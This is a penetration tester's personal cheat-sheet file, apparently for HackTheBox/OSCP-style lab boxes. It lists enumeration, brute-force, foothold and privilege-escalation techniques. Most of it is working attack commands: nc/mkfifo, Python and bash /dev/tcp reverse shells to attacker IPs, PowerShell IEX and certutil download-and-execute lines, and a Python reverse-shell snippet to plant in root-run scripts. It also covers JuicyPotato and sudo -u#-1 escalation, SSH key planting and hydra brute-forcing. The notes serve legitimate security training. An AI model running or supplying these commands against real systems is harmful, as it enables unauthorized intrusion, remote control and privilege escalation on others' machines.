-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmaster_notes.txt
More file actions
255 lines (204 loc) · 10 KB
/
master_notes.txt
File metadata and controls
255 lines (204 loc) · 10 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
==Classic==
Python stabilize shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
==Enumeration==
Big Gobuster scan:
gobuster dir -u http://10.10.11.104 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -x php,html,config
A good CEWL:
cewl -w output.txt -d 10 -m 1 http://10.10.10.191/
SMB enumeration:
https://www.hackingarticles.in/a-little-guide-to-smb-enumeration/
smbclient //10.11.1.146/SusieShare -U " "%" "
susieshare is name of file share
no username and no password login attempt
SMB hydra:
hydra -L user.txt -P pass.txt <IP> smb
Tomcat:
Default admin dashboard is located at http://<IP>:<PORT>/manager/html (default creds admin:admin)
host-manager admin dasbhoard is at http://IP:PORT/host-manager/html
bruteforce: hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html
if can only access host-manager, get shell with: https://medium.com/@cyb0rgs/exploiting-apache-tomcat-manager-script-role-974e4307cd00
DNS Stuff:
To use nslookup:
nslookup
SERVER <IP>
127.0.0.1
<IP again>
this should give you something to work with. ex: ns1.cronos.htb
the DOMAIN NAME here is cronos.htb
Use nslookup to identify domain name then try to find subdomains with:
dig axfr @10.10.10.13 cronos.htb
dig ANY cronos.htb @10.10.10.13
where cronos.htb is doimain portion of domain name and IP is IP obvi lol
subdomian bruteforce:
gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
where cronos.htb is the domain name
ns1.cronos.htb, www.cronos.htb, admin.cronos.htb
==Foothold==
Good bruteforce ssh:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -e nsr -s 22 ssh://IP
nc shell without -e
mkfifo pipe; nc -nv 10.10.14.90 443 < pipe | /bin/sh 2>pipe >pipe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.90 443 >/tmp/f
RUN THIS ONE A CUOPLE TIMES!!!! sometimes has issue removing /tmp/f if it doesn't exist, run it a few times to make/rm file successfully
URL ENCODE IT IN BURPSUITE TOO
Establish winrm session (port 5985 Windows):
evil-winrm -i <IP> -P <PORT #> -p <password> -u <username>
Impacket-psexec - used to log on to windows box via port 445
can be as easy as:
impacket-psexec <username>@<IP or domain name>
then input password when prompted.
(see secnotes)
HTTP bruteforce w/ hydra:
https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/
Python3 Reverse shell
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
same as python but with a python3
Shell without a forward slack /
nc 10.10.14.10 4444 -c bash
EvilWinRM
WinRM is on port 5985 - if open, can be used to get shell on Windows boxes with:
evil-winrm -i 10.10.10.203 -u <user> -p <pass>
==Upgrading shells (in tmux w/ zsh):==
in shell terminal:
ctrl-z
stty raw -echo; fg
hit enter x2
<done> (should be back in shell)
in kali term:
stty -a
(get rows and columns)
in shell term:
stty rows # columns # (sets shell to full term)
export TERM=xterm-color (lets you clear)
==Transfer Files==
Certutil:
certutil.exe -urlcache -split -f "http://192.168.119.207:8000/nc.exe" c:\xampp\htdocs\nc.exe
https://isroot.nl/2018/07/09/post-exploitation-file-transfers-on-windows-the-manual-way/
Transfer with ftp server:
python2 -m pyftpdlib -p 21 -w ##spins up a FTP server in the directory you are located on port 21 and it allows anonymous login access.
python3 -m pyftpdlib -p 21 -w ##spins up a Python 3.X FTP server in the directory you are located on port 21 and it allows anonymous login access.
Transfer via Powershell:
IEX(New-Object Net.WebClient).downloadString('http://<IP>:<PORT>/<file>')
this can be used to create reverse shell (put a nishang PS shell in there)
best one to use is Invoke-PowerShellTcp.ps1 BUT Put this at bottom of that ps1:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 6666
can run this IEX command in a terminal BUT If not already powershell must put: powershell "IEX.....')"
this will EXECUTE after downloading
(New-Object Net.WebClient).DownloadFile('http://>IP>:<PORT>/<file>', 'C:\<path>')
THIS WILL ONLY DOWNLOAD, NOT EXECUTE.
put "powershell '(New....')'" if not in powershell already
or try without the ' ' (before new and at the end) if it doesn't work with the ' '
make sure the file path for destination ACTUALLY exists...
IEX (IWR http://<IP>:<port>/<file> -UseBasicParsing)
another method similar to above but doesn't require the use of quotation marks in case that's an issue!
useful when antivirus AV is an issue!
use this from webshell beacuse it executes immediately!
IWR http://<IP>:<port>/<file> -OutFile <name>
use this for local! (after getting shell)
==PE TIPS:==
Python stabilize shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Log into (my)SQL database with:
mysql -u wpuser -p
input password
SHOW DATABASES;
; is very important
USE wp (wp is the database)
SHOW TABLES;
SHOW COLUMNS FROM wp_users (wp_users is the column)
THEN TO GET THE ACTUAL results:
SELECT * FROM wp_users
capabilites:
getcap -r / 2>/dev/null
use this to check capabilities (like suid but different) and then search google to find if PE is available. example:
root@cap:/root# getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
was able to use cap_setuid and getcap to PE to root from user nathan on this box.
https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/
Adding ssh keys (if given file write ability)
from kali:
ssh-keygen
name file
cat <name>.pub, take everything from (and including) ssh-rsa to the final = (don't copy root@kali)
from victim:
write that into file however you can
file to write to: /root/.ssh/authorized_keys
<or whatever user instead of root>
from kali:
chmod 600 <name> (NOT name.pub)
ssh -i <name> root@<IP>
(or whatever user instead of root)
PE SUID Bit Stuff (gtfobins):
find / -type f -perm /6000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
find / -type f -perm /2000 2>/dev/null
cctc final notes
Sudo vuln:
versions prior to 1.8.28:
sudo -u#-1 /bin/bash
/bin/bash being the command you have perms to run as anything but root!
Windows where TIPS
where /R c:\ bash.exe
will search recursively for file named bash.exe in c:\
JuicyPotato
great resource: https://r3dbuck3t.notion.site/Juicy-Potato-37853a8356c64e6da0cedc037e83c8e0
How to use:
Look for the associated privileges. Transfer nc and juicypotato.
C:\tmp>echo C:\tmp\nc.exe -e cmd.exe 10.10.14.10 4444 > shell.bat
Command: C:\tmp>./jp.exe -t * -p C:\tmp\shell.bat -l 1137
if this doesn't work, try some other CLSIDs (see below)
for "COM -> recv failed with error: 10038" or similar error, test CSLIDs and try multiple:
transfer the list that corresponds to your system: https://github.com/ohpe/juicy-potato/tree/master/CLSID
MUST be named CLSID.list on windows victim host
EDIT and transfer test_clsid.bat: https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat (it's already in exploit/potatoes dir tho)
EDIT on kali the name of the juicy potato file you want to use (different depending on what you do) - ex: jp32.exe -z -l !port! -c %%i >> result.log
jp32.exe MUST be the name of the juicy potato .exe that you have on the victim
run test_clsid.bat and wait for it to go through all the CLSIDs. when the port number changes, that means it's a good CLSID. copy down a few
because sometimes even the 'good' ones don't work. then run. ex:
{B474265E-3EF5-46E8-9FD9-AE034F34FC74} 10000
{C529C7EF-A3AF-45F2-8A47-767B33AA5CC0} 10001 - THIS IS THE GOOD ONE.
then: jp32.exe -t * -p C:\tmp\shell.bat -l 1337 -c {5B99FA76-721C-423C-ADAC-56D03C8A8007}
just a note - jp32.exe will work on a 64 bit system. CLSID stuff might be tough though and necessite this step^
Groups
adm - can read logs (look for passwords)
Good find commands:
find / -user shaun -ls 2>/dev/null
finds any files owned by 'shaun'
SharpCollection for precompiled .exes
https://github.com/Flangvik/SharpCollection
Shells within scripts (especially if you can write to a directory that contains a python file ran by root or a python library file):
With access to python file,
import os
import sys
try:
os.system("bash -c 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1'")
except:
sys.exit()
another option:
----
import pty
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.7",443))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()
-----
Read ADS from
cmd: more < file.txt:stream.txt
PS: Get-Content file.txt -stream stream.txt
==PASSWORD CRACKING==
john
zip files:
zip2john 16162020_backup.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
==etc==
/usr/bin/env: ‘bash\r’: No such file or directory
with this error, us dos2unix on the .sh script